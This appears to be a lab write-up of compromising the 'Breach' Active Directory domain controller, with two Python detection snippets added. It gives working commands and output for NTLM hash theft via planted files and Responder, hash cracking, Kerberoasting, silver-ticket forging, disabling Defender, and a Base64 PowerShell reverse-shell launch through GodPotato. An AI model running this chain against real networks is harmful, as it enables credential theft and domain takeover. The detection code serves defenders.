Operating System: Microsoft Windows Server 2022 Datacenter
Chain: False
Credentials
✅ Valid Usernames
George.Williams@breach.vl
Guest@breach.vl
Julia.Wong@breach.vl
BREACHDC$@breach.vl
Hilary.Reed@breach.vl
Jasmine.Price@breach.vl
Claire.Pope@breach.vl
Administrator@breach.vl
Diana.Pope@breach.vl
Christine.Bruce@breach.vl
Lawrence.Kaur@breach.vl
Jasmine.Slater@breach.vl
svc_mssql@breach.vl
Hugh.Watts@breach.vl
🔑 Passwords list
Nmap Scan
# Nmap 7.94SVN scan initiated Sat Apr 5 22:28:57 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_breach_tcp_allports -vvv 10.10.106.9
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-06 02:35:21Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53961/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
54183/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Service Enumeration
DNS
Not vulnerable to AXFR zone transfer
SMB
Allows null session authentication
Allows guest session authentication (random username)
RID brute force is allowed, retrieving usernames
No users with UF_DONT_REQUIRE_PREAUTH set (AS-REP roasting not possible)
No users using their username as password
The share folder has READ and WRITE permission.
Exploitation
LLMNR & NBT-NS Poisoning attack
python3 ntlm_theft.py -s 10.8.5.48 -f invoce -g all
Once the files were generated, the tester uploaded them to the public SMB share, successfully capturing Julia.Wong's NTLMv2 hash.
sudo responder -I tun0 -dwv
[sudo] password for Intrusionz3r0:
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.109.16
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:da6bf7288a9319b<SNIP>
Finally, the tester used hashcat to recover Julia.Wong's plaintext password.
hashcat -m 5600 Julia.Wong.ntlmv2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
JULIA.WONG::BREACH:da6bf7288a9<SNIP>e0038000000000000000:Computer1
Retrieving svc_mssql's Ticket Granting Service (TGS) ticket (Kerberoasting)
❯ nxc ldap 10.10.109.16 -u 'Julia.Wong' -p 'Computer1' --kerberoast kerberoast.hashes
SMB 10.10.109.16 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
LDAP 10.10.109.16 389 BREACHDC [+] breach.vl\Julia.Wong:Computer1
LDAP 10.10.109.16 389 BREACHDC Bypassing disabled account krbtgt
LDAP 10.10.109.16 389 BREACHDC [*] Total of records returned 1
LDAP 10.10.109.16 389 BREACHDC sAMAccountName: svc_mssql memberOf: pwdLastSet: 2022-02-17 05:43:08.106169 lastLogon:2025-04-05 23:21:38.187318
LDAP 10.10.109.16 389 BREACHDC $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$d320fad6bb2be1deeb42bdae6c979a52$<SNIP>
Once the ticket was retrieved, the tester proceeded to crack it using hashcat.
❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$d320fad6bb2be1deeb42bdae6c979a52$<SNIP>:Trustno1
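The `$krb5tgs$23$` prefix in the cracked hash means the service ticket for svc_mssql was issued with RC4-HMAC (etype 0x17), which is what makes offline cracking practical. On the DC every service-ticket request is logged as Security event 4769 with its encryption type; the Python below, added here as a defender's example and not part of the original write-up, parses constructed 4769 messages and flags accounts that obtained RC4 tickets for user-managed service accounts. Field names follow the 4769 message text; the sample events are constructed.

```python
import re
from collections import defaultdict

# Constructed 4769 messages in the form the Security log renders them, separated
# by "---". Not real telemetry from the engagement.
SAMPLE_4769 = """\
Account Name: Julia.Wong@BREACH.VL
Service Name: svc_mssql
Client Address: ::ffff:10.8.5.48
Ticket Encryption Type: 0x17
Failure Code: 0x0
---
Account Name: Julia.Wong@BREACH.VL
Service Name: BREACHDC$
Client Address: ::ffff:10.8.5.48
Ticket Encryption Type: 0x12
Failure Code: 0x0
"""

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP; AES128/256 are 0x11/0x12
FIELD_RE = re.compile(r"^([A-Za-z ]+):\s*(.*)$")

def parse_4769(text):
    """Split rendered 4769 messages into dicts of their 'Field: value' lines."""
    events = []
    for block in text.split("---"):
        fields = {}
        for line in block.strip().splitlines():
            m = FIELD_RE.match(line.strip())
            if m:
                fields[m.group(1).strip()] = m.group(2).strip()
        if fields:
            events.append(fields)
    return events

def is_kerberoast_candidate(ev):
    """Successful RC4 ticket for a user-managed SPN (not a computer account, not krbtgt)."""
    svc = ev.get("Service Name", "")
    return (ev.get("Failure Code") == "0x0"
            and ev.get("Ticket Encryption Type", "").lower() in RC4_ETYPES
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def kerberoast_suspects(text):
    """Map requesting account -> sorted service accounts it obtained RC4 tickets for."""
    hits = defaultdict(set)
    for ev in parse_4769(text):
        if is_kerberoast_candidate(ev):
            hits[ev["Account Name"]].add(ev["Service Name"])
    return {acct: sorted(svcs) for acct, svcs in hits.items()}
```

Computer accounts and krbtgt are excluded because their keys are long and random; the mitigation for the remaining hits is a long random password or a gMSA for the service account and AES-only encryption types on it.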
Post Exploitation
Crafting Silver ticket to impersonate Administrator account
❯ impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn MSSQLSvc/BREACHDC.breach.vl Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
❯ KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k BREACHDC.breach.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)>
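A silver ticket is forged with the service account's key and never touches the KDC, so the DC logs no 4769 for it while the SQL host still records a Kerberos network logon (4624). The Python below, added here as a defender's example and not part of the original write-up, correlates constructed 4624 records from the service host against constructed 4769 records from the DC and reports logons that no issuing request can account for; it assumes both hosts' clocks are synchronised and that the service ticket lifetime is the 10-hour default.

```python
from datetime import datetime, timedelta

# Constructed DC 4769 records (time, requesting account, service account). Not engagement data.
DC_4769 = [
    ("2025-04-05T23:21:38", "Julia.Wong@BREACH.VL", "svc_mssql"),
]
# Constructed SQL-host 4624 records (time, account, authentication package, logon type).
HOST_4624 = [
    ("2025-04-05T23:21:40", "Julia.Wong", "Kerberos", 3),
    ("2025-04-06T00:02:11", "Administrator", "Kerberos", 3),  # forged ticket: KDC never saw it
    ("2025-04-06T00:05:00", "Lawrence.Kaur", "NTLM", 3),       # NTLM logon, out of scope here
]

# Default domain policy caps a service ticket at 10 hours, so a legitimate logon may
# reuse a ticket the DC issued up to that long before it.
MAX_TICKET_LIFETIME = timedelta(hours=10)

def _ts(s):
    return datetime.fromisoformat(s)

def unmatched_kerberos_logons(host_4624, dc_4769, service="svc_mssql",
                              lifetime=MAX_TICKET_LIFETIME):
    """Kerberos network logons on the service host that no 4769 for the same account
    and service, issued within one ticket lifetime beforehand, can account for."""
    issued = [(_ts(t), acct.split("@")[0].lower(), svc.lower())
              for t, acct, svc in dc_4769]
    suspects = []
    for t, acct, package, logon_type in host_4624:
        if package != "Kerberos" or logon_type != 3:
            continue  # only Kerberos network logons can come from a forged TGS
        when = _ts(t)
        backed = any(svc == service.lower() and a == acct.lower()
                     and timedelta(0) <= when - issued_at <= lifetime
                     for issued_at, a, svc in issued)
        if not backed:
            suspects.append((t, acct))
    return suspects

if __name__ == "__main__":
    for t, acct in unmatched_kerberos_logons(HOST_4624, DC_4769):
        print(f"{t}: Kerberos logon by {acct} with no matching TGS request on the DC")
```

Rotating the svc_mssql password twice invalidates any ticket forged from the old key; the same correlation also catches tickets forged for accounts that do not exist on the DC at all.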
Compromise Domain Controller
Since the obtained shell is running under a service account, the SeImpersonatePrivilege token is active.
To compromise the domain, the tester performed the following steps:
Disabled Windows Defender’s real-time protection using the following command:
PS C:\Temp > .\GodPotato-NET4.exe -cmd 'cmd /c powershell.exe Set-MPPreference -DisableRealTimeMonitoring $true'
Then, executed a reverse shell by invoking a Base64-encoded PowerShell payload:
PS C:\Temp > .\GodPotato-NET4.exe -cmd 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAd<SNIP>